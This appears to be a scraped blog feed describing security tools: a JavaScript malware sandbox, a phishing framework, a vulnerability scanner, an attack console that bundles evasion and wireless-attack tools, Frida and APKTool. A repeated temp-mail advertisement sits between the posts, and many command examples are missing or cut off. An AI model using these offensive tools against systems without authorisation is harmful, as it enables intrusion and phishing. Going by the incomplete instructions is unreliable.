Malware-Jail – Tool For Javascript Malware Analysis, Deobfuscation and Payload Extraction

Malware-Jail - Tool For Javascript Malware Analysis, Deobfuscation and Payload Extraction

Malware-Jail is a sandbox for semi-automatic Javascript malware analysis, deobfuscation and payload extraction. It is written for Node.js.

It runs on any operating system. Developed and tested on Linux, Node.js v6.6.0.

Note: Due to use of some ES6 features, you’ll need Node.js >= 6.x.

Malware-Jail is written for Node’s ‘vm’ sandbox. Currently implements WScript (Windows Scripting Host) context  env/wscript.js , at least the part frequently used by malware. Internet browser context is partialy implemented  env/browser.js .

How To Install Malware-Jail

You’ll need Node.js and npm installed. Because malware-jail is built on top of minimist, iconv-lite and entities.

Pull from GitHub

Pull the source with git:

Then install all the dependecies (minimist, entities, iconv-lite) with:

Usage

In the examples folder you may find a deactivated malware file. Run the analysis with:

Internet browser based malware you may test with

At the end of the analysis the complete sandbox context is dumped into a ‘sandbox_dump_after.json‘ file.

You may want to examine following entries of ‘sandbox_dump_after.json‘:

  • eval_calls – array of all eval() calls arguments. Useful if eval() is used for deobfucation.
  • wscript_saved_files – content of all files that the malware attempted to drop. The actual files are saved into the output/ directory too.
  • wscript_urls – all URLs that the malware intended to GET or POST.
  • wscript_objects – WScript or ActiveX objects created.

sandbox_dump_after.json‘ uses JSONPath, implemented by JSON-js/cycle.js, to save duplicated or cyclic references to a same object.

Sample Output

In the above example the payload has been extracted into output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf

Examples

The malware folder contains real-world malware samples. Most of them downloaded from https://malwr.com.

Example: Analysing Wileen.js

Taking malicious script from malwr.com: Wileen.js
Apparently the malware does not execute if run from within a browser:

Therefore you may want to use an alternate config filem which does not load browser/DOM components:

Interesting use of Powershell:

Example: Analysing ORDER-10455.js

Taking malicious JavaScript from malwr.com: ORDER-10455.js

First run without interaction with remote servers:

you get something like:

Seems to be a “standard” behaviour of deobfuscation in order to finally download an exe binary and execute it.

If we want to get the real payload, run it with ‘–down=y’:

Example: Analysing Norri.js

Taking malicious JavaScript from malwr.com: Norri.js

Run:

you get: 

Behaviour is obvious from the log. Payload has been extracted into the output/TemporaryFolder_TempFile[15] file.

Example: Analysing Angler EK

Download and extract Angler EK from a pcap file at ANGLER EK SENDS CRYPTOWALL into a malware/angler/angler_full.html.

Strip the non Angler part and save as malware/angler/angler_stripped.html.

Remove 

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Gophish – An Open-Source Phishing Toolkit

Gophish - An Open-Source Phishing Toolkit

Gophish is a powerful, open-source phishing framework that makes the simulation of real-world phishing attacks dead-simple.

The idea behind gophish is simple – make industry-grade phishing training available to everyone. “Available” in this case means two things:

  • Affordable – Gophish is open-source software that is completely free for anyone to use.
  • Accessible – Gophish is written in the Go programming language. This has the benefit that gophish releases are compiled binaries with no dependencies. In a nutshell, this makes installation as simple as “download and run”!

How To Install Gophish

Gophish is provided as a pre-built binary for most operating systems. With this being the case, installation is as simple as downloading the ZIP file containing the binary that is built for your OS and extracting the contents.

Building Gophish from Source

Since Gophish is written in the Go programming language, it is extremely simple to build from source. All you will need is the Go language and a C compiler (such as gcc).

To build gophish from source, simply run go get github.com/gophish/gophish. This downloads gophish into your $GOPATH.

Next, navigate to $GOPATH/src/github.com/gophish/gophish and run the command go build. This builds a gophish binary in the current directory.

Understanding the config.json

There are some settings that are configurable via a file called config.json, located in the gophish root directory. Here are some of the options that you can set to your preferences:

Be careful: Since the config.json file contains database credentials, you will want to ensure it is only readable by the correct user. For Linux users, you can do this using chmod 640 config.json.

Exposing Gophish to the Internet

By default, the phish_server.listen_url is configured to listen on all interfaces. This means that if the host Gophish is running on is exposed to the Internet (such as running on a VPS), the phishing server will be exposed to the Internet.

If you also want the admin server to be accessible over the Internet, you will need to change the entry for the admin_server.listen_url to 0.0.0.0:3333.

Be careful: Exposing the admin server to the Internet should only be used if needed. Before exposing the admin server to the Internet, it’s highly recommended to change the default password.

Using MySQL

The default database in Gophish is SQLite. This is perfectly functional, but some environments may benefit from leveraging a more robust database such as MySQL.

Support for Mysql has been added as of 0.3-dev. To setup Gophish for Mysql, a couple extra steps are needed.

Update config.json:

First, change the entries in config.json to match your deployment:

Example:

The format for the db_path entry is

Update MySQL Config:

Gophish uses a datetime format that is incompatible with MySQL >= 5.7. To fix this, Add the following lines to the bottom of /etc/mysql/mysql.cnf:

The above settings are the default modes for MySQL, but with NO_ZERO_IN_DATE and NO_ZERO_DATE removed.

Create the Database:

The last step you’ll need to do to leverage Mysql is to create the gophish database. To do this, log into mysql and run the command

After that, you’ll be good to go!

Now that you have gophish installed, you’re ready to run the software. To launch gophish, simply open a command shell and navigate to the directory the gophish binary is located.

Then, execute the gophish binary. You will see some informational output showing both the admin and phishing web servers starting up, as well as the database being created. This output will tell you the port numbers you can use to connect to the web interfaces.

To run Gophish as a service in Linux distributions, you will need to setup a service script. You can refer to this Github issue for an example implementation.

Now that you have gophish installed, you’re ready to run the software. To launch gophish, simply open a command shell and navigate to the directory the gophish binary is located.

Then, execute the gophish binary. You will see some informational output showing both the admin and phishing web servers starting up, as well as the database being created. This output will tell you the port numbers you can use to connect to the web interfaces.

 If your phishing server is set to run on TCP port 80, then you may need to run Gophish as an administrator so that it can bind to the privileged port.

to reach the login page.


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Arpy – Mac OSX ARP Spoof (MiTM) Tool


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

V3n0M – An Open Source Vulnerability Scanner

V3n0M - An Open Source Vulnerability Scanner

V3n0M is a free and open source scanner. Evolved from Baltazar’s scanner, it has adopted several new features that improve functionality and usability.

This program is for finding and executing various vulnerabilities. It scavenges the web using dorks and organizes the URLs it finds.

It is very useful for executing:

  • Cloudflare Resolver[Cloudbuster]
  • LFI->RCE and XSS Scanning[LFI->RCE & XSS]
  • SQL Injection Vuln Scanner[SQLi]
  • Extremely Large D0rk Target Lists
  • AdminPage Finding
  • Toxin [Vulnerable FTPs Scanner]
  • DNS BruteForcer
  • Python 3.6 Asyncio based scanning

The official adoption of darkd0rker heavily recoded, updated, expanded and improved upon

  • Brand new, just outta the box!
  • Most efficient Cloudflare resolver around with easy to use interface.
  • Extremely quick “Toxin” Vulnerable IP scanner to scan potentially millions of IPs for known vulnerable services.
  • Largest and most powerful d0rker online, 14k+d0rks searched over ~ Engines at once.
  • Free and Open /src/
  • cross-platform Python-based toolkit
  • Release 425 Released on 18th February 2018
  • Licensed under GPLv3

Tested on: ArchLinux 4.14, Ubuntu, Debian, Kali, MacOS, BlackArch, Manjaro/ArchLinux ARM Ed. Android-Termux.

Note for Ubuntu users: Please make sure you have installed –> sudo apt-get install python3-bs4 and apt-get install python3-setuptools

      Otherwise you may get Syntax Error stopping the program from running.
Note for Kali users: Please make sure you have installed –> apt-get install python3-dev apt-get install python-dev

Install Note:

$ git clone https://github.com/v3n0m-Scanner/V3n0M-Scanner.git
$ cd V3n0M-Scanner/
$ python3 setup.py install --user


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

KillChain – A Unified Console To Perform The “Kill Chain” Stages of Attacks

Kill Chain Setup:

Installing Killchain.py:

sudo apt-get update
sudo apt-get install websploit openvas veil-evasion tor
sudo git clone https://github.com/ruped24/killchain.git
cd killchain
chmod +x killchain.py
sudo ./killchain.py

Once the installation is complete:
Go through the options on the menu:

OpenVas takes a while on first run. Go get a coffee or two. You can launch multi Kill 
Chain sessions. No need to watch paint dry. Once OpenVas setup has completed; Reset 
openvas web interface admin password by running the commands below in an external 
terminal.
sudo openvas-start
sudo openvasmd --user=admin --new-password=
Point your browser to https://localhost:9392

Login Username = admin

Login Password = Your_new_reset_admin_password
Note on Veil-Evasion: Veil will complete the setup upon launch. Accept all the defaults. 
This takes a while. Don't leave the screen tho, there's dialog you will have to click 
through. Once it’s complete, it will auto launch.

Websploit: To exit websploit, type exit.

Metasploit: To exit Metasploit, type exit.

WiFite: It’s for site survey within the framework of this console.

Run wifite in an external terminal to do wireless attacks against the target.


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Frida – Dynamic Instrumentation Toolkit for Developers, Reverse-Engineers, and Security Researchers

Frida - Dynamic Instrumentation Toolkit for Developers, Reverse-Engineers, and Security Researchers

Frida is a dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers.


It is

  • Scriptable: It lets you inject your own scripts into black box processes. Hook any function, spy on crypto APIs or trace private application code, no source code needed. Edit, hit save, and instantly see the results. All without compilation steps or program restarts. 
  • Portable: Works on Windows, macOS, GNU/Linux, iOS, Android, and QNX. Install the Node.js bindings from npm, grab a Python package from PyPI, or use Frida through its Swift bindings, .NET bindings, Qt/Qml bindings, or C API. 
  • Free: Frida is a free software.
  • Battle-tested: It is very popular among security researchers and pentesters.

Frida also provides you some simple tools built on top of the Frida API. These can be used as-is, tweaked to your needs, or serve as examples of how to use the API.

Why You Need Frida In Your Arsenal (Here are some use-cases):

  • There’s this new hot app everybody’s so excited about, but it’s only available for iOS and you’d love to interop with it. You realize it’s relying on encrypted network protocols and tools like Wireshark just won’t cut it. You pick up Frida and use it for API tracing.
  • You’re building a desktop app which has been deployed at a customer’s site. There’s a problem but the built-in logging code just isn’t enough. You need to send your customer a custom build with lots of expensive logging code. Then you realize you could just use Frida and build an application- specific tool that will add all the diagnostics you need, and in just a few lines of Python. No need to send the customer a new custom build – you just send the tool which will work on many versions of your app.
  • You’d like to build a Wireshark on steroids with support for sniffing encrypted protocols. It could even manipulate function calls to fake network conditions that would otherwise require you to set up a test lab.
  • Your in-house app could use some black-box tests without polluting your production code with logic only required for exotic testing.

Tools:

  • Frida CLI: Frida CLI is a REPL interface that aims to emulate a lot of the nice features of IPython (or Cycript), which tries to get you closer to your code for rapid prototyping and easy debugging.
# Connect Frida to an iPad over USB and start debugging Safari
$ frida -U Safari
    _____
   (_____)
    |   |    Frida 4.0.0 - A world-class dynamic
    |   |                  instrumentation framework
    |`-'|
    |   |    Commands:
    |   |        help      -> Displays the help system
    |   |        object?   -> Display information about 'object'
    |   |        exit/quit -> Exit
    |   |
    |   |    More info at http://www.frida.re/docs/home/
    `._.'

[USB::iPad 4::Safari]->

An example session:

# Connect Frida to a locally-running Calculator.app
$ frida Calculator
    _____
   (_____)
    |   |    Frida 4.0.0 - A world-class dynamic
    |   |                  instrumentation framework
    |`-'|
    |   |    Commands:
    |   |        help      -> Displays the help system
    |   |        object?   -> Display information about 'object'
    |   |        exit/quit -> Exit
    |   |
    |   |    More info at http://www.frida.re/docs/home/
    `._.'

# Look at the local variables/context
[Local::ProcName::Calculator]-> 
Backtracer           Process
CpuContext           Proxy
Dalvik               Socket
DebugSymbol          Stalker
File                 Thread
Frida                WeakRef
Instruction          clearInterval
Interceptor          clearTimeout
Memory               console
MemoryAccessMonitor  gc
Module               ptr
NULL                 recv
NativeCallback       send
NativeFunction       setInterval
NativePointer        setTimeout
ObjC
# Look at things exposed through the ObjC interface
[Local::ProcName::Calculator]-> ObjC.
Object            implement         selector
available         mainQueue         selectorAsString
classes           schedule
# List the first 10 classes (there are a lot of them!)
[Local::...::Calculator]-> Object.keys(ObjC.classes).slice(0, 10)
[
    "NSDrawer",
    "GEOPDETAFilter",
    "NSDeserializer",
    "CBMutableCharacteristic",
    "NSOrthographyCheckingResult",
    "DDVariable",
    "GEOVoltaireLocationShiftProvider",
    "LSDocumentProxy",
    "NSPreferencesModule",
    "CIQRCodeGenerator"
]



Loading a script:

# Connect Frida to a locally-running Calculator.app and load calc.js
$ frida Calculator -l calc.js
    _____
   (_____)
    |   |    Frida 4.0.0 - A world-class dynamic
    |   |                  instrumentation framework
    |`-'|
    |   |    Commands:
    |   |        help      -> Displays the help system
    |   |        object?   -> Display information about 'object'
    |   |        exit/quit -> Exit
    |   |
    |   |    More info at http://www.frida.re/docs/home/
    `._.'

# The code in calc.js has now been loaded and executed
[Local::ProcName::Calculator]->
# Reload it from file at any time
[Local::ProcName::Calculator]-> %reload
[Local::ProcName::Calculator]->

Enable the Node.js compatible debugger:

# Connect Frida to a locally-running Calculator.app
# and load calc.js with the debugger enabled
$ frida Calculator -l calc.js --debug
    _____
   (_____)
    |   |    Frida 4.0.0 - A world-class dynamic
    |   |                  instrumentation framework
    |`-'|
    |   |    Commands:
    |   |        help      -> Displays the help system
    |   |        object?   -> Display information about 'object'
    |   |        exit/quit -> Exit
    |   |
    |   |    More info at http://www.frida.re/docs/home/
    `._.'

Debugger listening on port 5858
# We can now run node-inspector and start debugging calc.js
[Local::ProcName::Calculator]->

  • frida-ps: This is a command-line tool for listing processes, which is very useful when interacting with a remote system. (You can acquire device id from frida-ls-devices tool)
# Connect Frida to an iPad over USB and list running processes
$ frida-ps -U

# List running applications
$ frida-ps -Ua

# List installed applications
$ frida-ps -Uai

# Connect Frida to the specific device
$ frida-ps -D 0216027d1d6d3a03

  • frida-trace: frida-trace is a tool for dynamically tracing function calls.
# Trace recv* and send* APIs in Safari, insert library names
# in logging
$ frida-trace --decorate -i "recv*" -i "send*" Safari

# Trace ObjC method calls in Safari
$ frida-trace -m "-[NSView drawRect:]" Safari

# Launch SnapChat on your iPhone and trace crypto API calls
$ frida-trace -U -f com.toyopagroup.picaboo -I "libcommonCrypto*"

# Trace all JNI functions in Samsung FaceService app on Android
$ frida-trace -U -i "Java_*" com.samsung.faceservice

# Trace a Windows process's calls to "mem*" functions in msvcrt.dll
$ frida-trace -p 1372 -i "msvcrt.dll!*mem*"

# Trace all functions matching "*open*" in the process except
# in msvcrt.dll
$ frida-trace -p 1372 -i "*open*" -x "msvcrt.dll!*open*"

# Trace an unexported function in libjpeg.so
$ frida-trace -p 1372 -a "libjpeg.so!0x4793c"

Full List of Options:

--version             show program's version number and exit
-h, --help            show this help message and exit
-D ID, --device=ID    connect to device with the given ID
-U, --usb             connect to USB device
-R, --remote          connect to remote frida-server
-H HOST, --host=HOST  connect to remote frida-server on HOST
-f FILE, --file=FILE  spawn FILE
-F, --attach-frontmost
                      attach to frontmost application
-n NAME, --attach-name=NAME
                      attach to NAME
-p PID, --attach-pid=PID
                      attach to PID
--stdio=inherit|pipe  stdio behavior when spawning (defaults to "inherit")
--runtime=duk|v8      script runtime to use (defaults to "duk")
--debug               enable the Node.js compatible script debugger
-I MODULE, --include-module=MODULE
                      include MODULE
-X MODULE, --exclude-module=MODULE
                      exclude MODULE
-i FUNCTION, --include=FUNCTION
                      include FUNCTION
-x FUNCTION, --exclude=FUNCTION
                      exclude FUNCTION
-a MODULE!OFFSET, --add=MODULE!OFFSET
                      add MODULE!OFFSET
-T, --include-imports
                      include program's imports
-t MODULE, --include-module-imports=MODULE
                      include MODULE imports
-m OBJC_METHOD, --include-objc-method=OBJC_METHOD
                      include OBJC_METHOD
-M OBJC_METHOD, --exclude-objc-method=OBJC_METHOD
                      exclude OBJC_METHOD
-s DEBUG_SYMBOL, --include-debug-symbol=DEBUG_SYMBOL
                      include DEBUG_SYMBOL
-q, --quiet           do not format output messages
-d, --decorate        Add module name to generated onEnter log statement
-o OUTPUT, --output=OUTPUT
                      dump messages to file

-U, –usb: connect to USB device:
This option tells frida-trace to perform tracing on a remote device connected via the host machine’s USB connection. Example: You want to trace an application running on an Android device from your host Windows machine. If you specify -U / –usb, frida-trace will perform the necessary work to transfer all data to and from the remote device and trace accordingly.

Note: When tracing a remote device, remember to copy the platform-appropriate frida-server binary to the remote device. Once copied, be sure to run the frida-server binary before beginning the tracing session. For example, to trace a remote Android application, you would copy the ‘frida-server-12.8.0-android-arm’ binary to the Android’s /data/local/tmp folder. Using adb shell, you would run the server in the background (e.g. frida-server-12.8.0-android-arm &).

-I, -X: include/exclude module:
These options allow you to include or exclude all functions in a particular module (e.g., *.so, *.dll) in one, single option. The option expects a filename glob for matching one or more modules. Any module that matches the glob pattern will be either included or excluded in its entirety.

frida-trace will generate a JavaScript handler file for each function matched by the -I option.

To exclude specific functions after including an entire module, see the -i option.

-i, -x: include/exclude function (glob-based):
These options enable you to include or exclude matching functions according to your needs. This is a flexible option, allowing a granularity ranging from all functions in all modules down to a single function in a specific module.

frida-trace will generate a JavaScript handler file for each function matched by the -i option.

The -i / -x options differ syntactically from their uppercase counterparts in that they accept any of the following forms (MODULE and FUNCTION are both glob patterns):

– MODULE!FUNCTION
– FUNCTION
– !FUNCTION
– MODULE!

Here are some examples and their descriptions:

-i "msvcrt.dll!*cpy*" Matches all functions with 'cpy' in its name, ONLY in msvcrt.dll
-i "*free*"         Matches all functions with 'free' in its name in ALL modules
-i "!*free*"         Identical to -i "*free*"
-i "gdi32.dll!"         Trace all functions in gdi32.dll

frida-trace has an internal concept of a “working set”, i.e., a set of “module:function” pairs whose handlers will be traced at runtime. The contents of the working set can be changed by an include / exclude command line option (-I / -X / -i / -x).

It is important to understand that the order of the include / exclude options is important. Each such option works on the current state of the working set, and different orderings of options can lead to different results. In other words, the include/exclude options are procedural (i.e., order counts) rather than simply declarative.

For example, suppose we want to trace all “str*” and “mem*” functions in all modules in a running process. In our example, these functions are found in three modules: ucrtbase.dll, ntdll.dll, and msvcrt.dll. To reduce the noise, however, we do not want to trace any functions found in the msvcrt.dll module.

We will describe three different option orders on the command line and show that they produce different results.

  • -i “str*” -i “mem*” -X “msvcrt.dll”
    • ‘-i “str*”‘ matches 80 functions in 3 modules, working set has 80 entries
    • ‘-i “mem*”‘ matches 18 functions in 3 modules, working set has 98 entries
    • ‘-X “msvcrt.dll”‘ removes the 28 “str” and 6 “mem” functions originating in msvcrt.dll, final working set has 64 entries.
  • -i “str*” -X “msvcrt.dll” -i “mem*”
    • ‘-i “str*”‘ matches 80 functions in 3 modules, working set has 80 entries
    • ‘-X “msvcrt.dll”‘ removes the 28 “str” functions originating in msvcrt.dll, working set has 52 entries.
    • ‘-i “mem*”‘ matches 18 functions in 3 modules including msvcrt.dll, final working set has 70 entries
  • -X “msvcrt.dll” -i “str*” -i “mem*”
    • ‘-X “msvcrt.dll”‘ tries to remove the 28 “str” and 6 “mem” functions originating in msvcrt.dll. Since the working set is empty, there is nothing to remove, working set has 0 entries.
    • ‘-i “str*”‘ matches 80 functions in 3 modules, working set has 80 entries
    • ‘-i “mem*”‘ matches 18 functions in 3 modules, final working set has 98 entries

-a: include function (offset-based):

This option enables tracing functions whose names are not exported by their modules (e.g., a static C/C++ function). This should not prevent you from tracing such functions, so long as you know that absolute offset of the function’s entry point.

Example: -a “libjpeg.so!0x4793c”

The option value provides both the full name of the module and the hex offset of the function entry point within the module.

frida-trace will generate a JavaScript handler file for each function matched by the -a option.

-d, –decorate: add module name to log tracing:

The –decorate option is relevant when frida-trace auto-generates JavaScript handler scripts. By default, a handler’s onEnter function looks like this:

onEnter: function (log, args, state) {
  log('memcpy()');
},

The drawback is that, if the same function name exists in multiple modules, it will be difficult to differentiate between function traces. The –decorate function instructs frida-trace to insert the module name in the default onEnter trace instruction:

onEnter: function (log, args, state) {
  log('memcpy() [msvcrt.dll]');
},

  • frida-discover: frida-discover is a tool for discovering internal functions in a program, which can then be traced by using frida-trace.
  • frida-ls-devices: This is a command-line tool for listing attached devices, which is very useful when interacting with multiple devices.
# Connect Frida to an iPad over USB and list running processes
$ frida-ls-devices

# example output

Id                                        Type    Name            
----------------------------------------  ------  ----------------
local                                     local   Local System    
0216027d1d6d3a03                          tether  Samsung SM-G920F
1d07b5f6a7a72552aca8ab0e6b706f3f3958f63e  tether  iOS Device      
tcp                                       remote  Local TCP  

  • frida-kill: This is a command-line tool for killing processes. You can acquire PIDs from frida-ps tool.
$ frida-kill -D  
# List active applications
$ frida-ps -D 1d07b5f6a7a72552aca8ab0e6b706f3f3958f63e  -a

PID  Name                Identifier                                           
----  ------------------  -----------------------------------------------------
4433  Camera              com.apple.camera                                     
4001  Cydia               com.saurik.Cydia                                     
4997  Filza               com.tigisoftware.Filza                               
4130  IPA Installer       com.slugrail.ipainstaller                            
3992  Mail                com.apple.mobilemail                                 
4888  Maps                com.apple.Maps                                       
6494  Messages            com.apple.MobileSMS                                                          
5029 Safari              com.apple.mobilesafari                               
4121  Settings            com.apple.Preferences  

# Connect Frida to the device and kill running process
$ frida-kill -D 1d07b5f6a7a72552aca8ab0e6b706f3f3958f63e 5029

# Check if process has been killed
$ frida-ps -D 1d07b5f6a7a72552aca8ab0e6b706f3f3958f63e  -a

PID  Name                Identifier                                           
----  ------------------  -----------------------------------------------------
4433  Camera              com.apple.camera                                     
4001  Cydia               com.saurik.Cydia                                     
4997  Filza               com.tigisoftware.Filza                               
4130  IPA Installer       com.slugrail.ipainstaller                            
3992  Mail                com.apple.mobilemail                                 
4888  Maps                com.apple.Maps                                       
6494  Messages            com.apple.MobileSMS                                                          
4121  Settings            com.apple.Preferences

How To Install Frida

Requirements for Frida’s CLI tools:

  • Python – latest 3.x is highly recommended
  • Windows, macOS, or GNU/Linux

Install with pip:

The best way to install Frida’s CLI tools is via PyPI:

$ pip install frida-tools

Install manually:
Download binaries and install it.

Testing Your Installation

Start a process we can inject into:

$ cat

Just let it sit and wait for input. On Windows you might want to use notepad.exe.

Note that this example won’t work on macOS El Capitan and later, as it rejects such attempts for system binaries. However, if you copy the cat binary to e.g., /tmp/cat then run that instead the example should work:

$ cp /bin/cat /tmp/cat
$ /tmp/cat
In another terminal, make a file example.py with the following contents:

import frida

def on_message(message, data):
    print("[on_message] message:", message, "data:", data)

session = frida.attach("cat")

script = session.create_script("""
rpc.exports.enumerateModules = function () {
  return Process.enumerateModules();
};
""")
script.on("message", on_message)
script.load()

print([m["name"] for m in script.exports.enumerate_modules()])

If you are on GNU/Linux, issue:

$ sudo sysctl kernel.yama.ptrace_scope=0

to enable ptracing non-child processes.

At this point, we are ready to take Frida for a spin! Run the example.py script and watch the magic:

$ python example.py

The output should be something similar to this (depending on your platform and library versions):

[u'cat', …, u'ld-2.15.so']

Modes of Operation

Frida provides dynamic instrumentation through its powerful instrumentation core Gum, which is written in C. Because such instrumentation logic is prone to change, you usually want to write it in a scripting language so you get a short feedback loop while developing and maintaining it. This is where GumJS comes into play. With just a few lines of C you can run a piece of JavaScript inside a runtime that has full access to Gum’s APIs, allowing you to hook functions, enumerate loaded libraries, their imported and exported functions, read and write memory, scan memory for patterns, etc.

Most of the time, however, you want to spawn an existing program, attach to a running program, or hijack one as it’s being spawned, and then run your instrumentation logic inside of it. As this is such a common way to use Frida, it is what most of our documentation focuses on. This functionality is provided by frida-core, which acts as a logistics layer that packages up GumJS into a shared library that it injects into existing software, and provides a two-way communication channel for talking to your scripts, if needed, and later unload them. Beside this core functionality, frida-core also lets you enumerate installed apps, running processes, and connected devices. The connected devices are typically iOS and Android devices where frida-server is running. That component is essentially just a daemon that exposes frida-core over TCP, listening on localhost:27042 by default.

It is sometimes not possible to use Frida in Injected mode, for example on jailed iOS and Android systems. For such cases we provide you with frida-gadget, a shared library that you’re supposed to embed inside the program that you want to instrument. By simply loading the library it will allow you to interact with it remotely, using existing Frida-based tools like frida-trace. It also supports a fully autonomous approach where it can run scripts off the filesystem without any outside communication.


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

APKTool – A Tool for Reverse Engineering Android APK Files

APKTool - A Tool for Reverse Engineering Android APK Files

APKTool is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with app easier because of project-like files structure and automation of some repetitive tasks like building apk, etc.

Note: It is NOT intended for piracy and other non-legal uses. It could be used for localizing, adding some features or support for custom platforms and other GOOD purposes. Just try to be fair with authors of an app, that you use and probably like.

Features

  • Disassembling resources to nearly original form (including resources.arsc, classes.dex, 9.png. and XMLs)
  • Rebuilding decoded resources back to binary APK/JAR
  • Organizing and handling APKs that depend on framework resources
  • Smali Debugging (Removed in 2.1.0 in favor of IdeaSmali)
  • Helping with repetitive tasks

Requirements

  • Java 8 (JRE 1.8)
  • Basic knowledge of Android SDK, AAPT and smali

How To Install APKTool

  • Windows:
    • Download Windows wrapper script (Right click, Save Link As apktool.bat).
    • Download apktool.
    • Rename downloaded jar to apktool.jar.
    • Move both files (apktool.jar & apktool.bat) to your Windows directory (Usually C://Windows).
    • If you do not have access to C://Windows, you may place the two files anywhere then add that directory to your Environment Variables System PATH variable.
    • Try running apktool via command prompt.
  • Linux:
    • Download Linux wrapper script (Right click, Save Link As apktool).
    • Download apktool.
    • Rename downloaded jar to apktool.jar.
    • Move both files (apktool.jar & apktool) to /usr/local/bin (root needed).
    • Make sure both files are executable (chmod +x).
    • Try running apktool via cli.
  • Mac OS X:
    • Download Mac wrapper script (Right click, Save Link As apktool).
    • Download apktool.
    • Rename downloaded jar to apktool.jar.
    • Move both files (apktool.jar & apktool) to /usr/local/bin (root needed).
    • Make sure both files are executable (chmod +x).
    • Try running apktool via cli.

Note: Wrapper scripts are not needed, but helpful so you don’t have to type java -jar apktool.jar over and over.

How to Build APKTool from Source

APKTool is a collection of 1 project, containing sub-projects and a few dependencies.

  • brut.apktool.lib – (Main, all the Library code)
  • brut.apktool.cli – The cli interface of the program
  • brut.j.dir – Utility project
  • brut.j.util – Utility project
  • brut.j.common – Utility project

Requirements:

  • JDK8 (Oracle or OpenJDK)
  • git

Build Steps:

  • First clone the repository.
    • git clone git://github.com/iBotPeaches/Apktool.git
    • cd Apktool
    • For steps 3-5 use ./gradlew for unix based systems or gradlew.bat for windows.
    • [./gradlew][gradlew.bat] build shadowJar – Builds Apktool, including final binary.
    • Optional (You may build a Proguard jar) [./gradlew][gradlew.bat] build shadowJar proguard

After build completes you should have a jar file at:
./brut.apktool/apktool-cli/build/libs/apktool-xxxxx.jar

Windows Requirements

Windows has some limitations regarding max filepath. At one location in APKTool, there is a 218 character directory path which means due to the limitation of max 255 characters on Windows we need to enforce some requirements.

This leaves 37 characters total to clone the project on Windows. For example, we can clone this project to the location.

This is 31 characters, which allows APKTool to be cloned properly. Cloning the project into a directory longer than 37 characters will not work.

You might also like:

  • Bluto – DNS Recon, Brute Forcer, DNS Zone Transfer, DNS Wild Card Checks, DNS Wild Card Brute Forcer, Email Enumeration, Staff Enumeration, and Compromised Account Checking
  • ARDT – Akamai Reflective DDoS Tool
  • Sonar.js – A Framework for Identifying and Launching Exploits Against Internal Network Hosts
  • CredCrack – A Fast and Stealthy Credential Harvester
  • SPF – SpeedPhishing Framework
  • King Phisher – Phishing Campaign Toolkit
  • D-Link Password Decryptor – Tool for Recovering Passwords from D-Link Modems/Routers
  • Kadimus – Local File Inclusion (LFI) Scan & Exploit Tool
  • SNMPBrute – Fast SNMP Brute Force, Enumeration, CISCO Config Downloader and Password Cracking Script
  • Egresser – Client/Server Scripts Designed To Test Outbound Firewall Rules
  • OnionShare – Tool For Sharing Files Securely and Anonymously (Windows, Linux, Mac OS X)
  • Pyrasite – Tools for Injecting Code Into a Running Python Process
  • Dumb0 – Simple Script To Harvest Usernames From Popular Forums and CMS
  • iGoat – A Deliberately Insecure iOS Application


Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.